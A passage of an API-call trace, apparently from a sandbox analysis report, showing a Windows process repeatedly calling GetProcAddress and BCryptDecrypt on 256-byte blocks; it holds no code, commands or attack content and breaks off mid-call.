BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e942d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205762e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205762e, pcbResult=0x14f8fc) returned 0x0 [0176.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.926] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e943d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057723, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057723, pcbResult=0x14f8fc) returned 0x0 [0176.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.927] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e944d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057818, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057818, pcbResult=0x14f8fc) returned 0x0 [0176.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.929] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e945d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205790d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205790d, pcbResult=0x14f8fc) returned 0x0 [0176.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.930] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e946d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057a02, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057a02, pcbResult=0x14f8fc) returned 0x0 [0176.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.931] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e947d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057af7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057af7, pcbResult=0x14f8fc) returned 0x0 [0176.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.933] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e948d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057bec, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057bec, pcbResult=0x14f8fc) returned 0x0 [0176.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.934] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e949d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057ce1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057ce1, pcbResult=0x14f8fc) returned 0x0 [0176.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.936] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e94ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057dd6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057dd6, pcbResult=0x14f8fc) returned 0x0 [0176.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.937] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e94bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057ecb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057ecb, pcbResult=0x14f8fc) returned 0x0 [0176.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.938] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e94cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057fc0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057fc0, pcbResult=0x14f8fc) returned 0x0 [0176.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.940] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e94dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20580b5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20580b5, pcbResult=0x14f8fc) returned 0x0 [0176.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.941] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e94ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20581aa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20581aa, pcbResult=0x14f8fc) returned 0x0 [0176.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.943] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e94fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205829f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205829f, pcbResult=0x14f8fc) returned 0x0 [0176.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.944] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e950d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058394, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058394, pcbResult=0x14f8fc) returned 0x0 [0176.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.946] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e951d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058489, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058489, pcbResult=0x14f8fc) returned 0x0 [0176.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.947] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e952d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205857e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205857e, pcbResult=0x14f8fc) returned 0x0 [0176.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.949] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e953d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058673, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058673, pcbResult=0x14f8fc) returned 0x0 [0176.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.950] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e954d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058768, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058768, pcbResult=0x14f8fc) returned 0x0 [0176.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.951] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e955d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205885d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205885d, pcbResult=0x14f8fc) returned 0x0 [0176.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.953] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e956d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058952, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058952, pcbResult=0x14f8fc) returned 0x0 [0176.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.954] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e957d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058a47, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058a47, pcbResult=0x14f8fc) returned 0x0 [0177.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.070] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e958d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058b3c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058b3c, pcbResult=0x14f8fc) returned 0x0 [0177.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.071] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e959d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058c31, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058c31, pcbResult=0x14f8fc) returned 0x0 [0177.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.072] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e95ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058d26, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058d26, pcbResult=0x14f8fc) returned 0x0 [0177.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.074] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e95bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058e1b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058e1b, pcbResult=0x14f8fc) returned 0x0 [0177.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.075] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e95cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2058f10, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2058f10, pcbResult=0x14f8fc) returned 0x0 [0177.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.077] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e95dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059005, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059005, pcbResult=0x14f8fc) returned 0x0 [0177.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.079] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e95ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20590fa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20590fa, pcbResult=0x14f8fc) returned 0x0 [0177.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.080] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e95fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20591ef, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20591ef, pcbResult=0x14f8fc) returned 0x0 [0177.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.081] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e960d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20592e4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20592e4, pcbResult=0x14f8fc) returned 0x0 [0177.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.083] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e961d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20593d9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20593d9, pcbResult=0x14f8fc) returned 0x0 [0177.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.084] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e962d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20594ce, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20594ce, pcbResult=0x14f8fc) returned 0x0 [0177.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.085] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e963d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20595c3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20595c3, pcbResult=0x14f8fc) returned 0x0 [0177.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.086] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e964d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20596b8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20596b8, pcbResult=0x14f8fc) returned 0x0 [0177.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.088] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e965d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20597ad, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20597ad, pcbResult=0x14f8fc) returned 0x0 [0177.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.089] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e966d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20598a2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20598a2, pcbResult=0x14f8fc) returned 0x0 [0177.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.091] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e967d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059997, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059997, pcbResult=0x14f8fc) returned 0x0 [0177.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.092] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e968d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059a8c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059a8c, pcbResult=0x14f8fc) returned 0x0 [0177.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.094] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e969d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059b81, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059b81, pcbResult=0x14f8fc) returned 0x0 [0177.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.096] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e96ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059c76, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059c76, pcbResult=0x14f8fc) returned 0x0 [0177.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.097] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e96bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059d6b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059d6b, pcbResult=0x14f8fc) returned 0x0 [0177.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.099] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e96cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059e60, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059e60, pcbResult=0x14f8fc) returned 0x0 [0177.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.100] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e96dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2059f55, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2059f55, pcbResult=0x14f8fc) returned 0x0 [0177.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.102] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e96ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a04a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a04a, pcbResult=0x14f8fc) returned 0x0 [0177.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.230] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e96fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a13f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a13f, pcbResult=0x14f8fc) returned 0x0 [0177.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.232] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e970d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a234, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a234, pcbResult=0x14f8fc) returned 0x0 [0177.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.234] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e971d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a329, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a329, pcbResult=0x14f8fc) returned 0x0 [0177.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.235] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e972d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a41e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a41e, pcbResult=0x14f8fc) returned 0x0 [0177.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.237] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e973d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a513, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a513, pcbResult=0x14f8fc) returned 0x0 [0177.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.238] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e974d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a608, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a608, pcbResult=0x14f8fc) returned 0x0 [0177.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.240] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e975d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a6fd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a6fd, pcbResult=0x14f8fc) returned 0x0 [0177.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.241] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e976d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a7f2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a7f2, pcbResult=0x14f8fc) returned 0x0 [0177.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.243] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e977d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a8e7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a8e7, pcbResult=0x14f8fc) returned 0x0 [0177.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.245] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e978d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205a9dc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205a9dc, pcbResult=0x14f8fc) returned 0x0 [0177.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.247] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e979d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205aad1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205aad1, pcbResult=0x14f8fc) returned 0x0 [0177.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.248] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e97ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205abc6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205abc6, pcbResult=0x14f8fc) returned 0x0 [0177.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.250] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e97bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205acbb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205acbb, pcbResult=0x14f8fc) returned 0x0 [0177.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.251] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e97cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205adb0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205adb0, pcbResult=0x14f8fc) returned 0x0 [0177.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.252] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e97dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205aea5, cbOutput=0xf5, pcbResult=0x14f8fc, 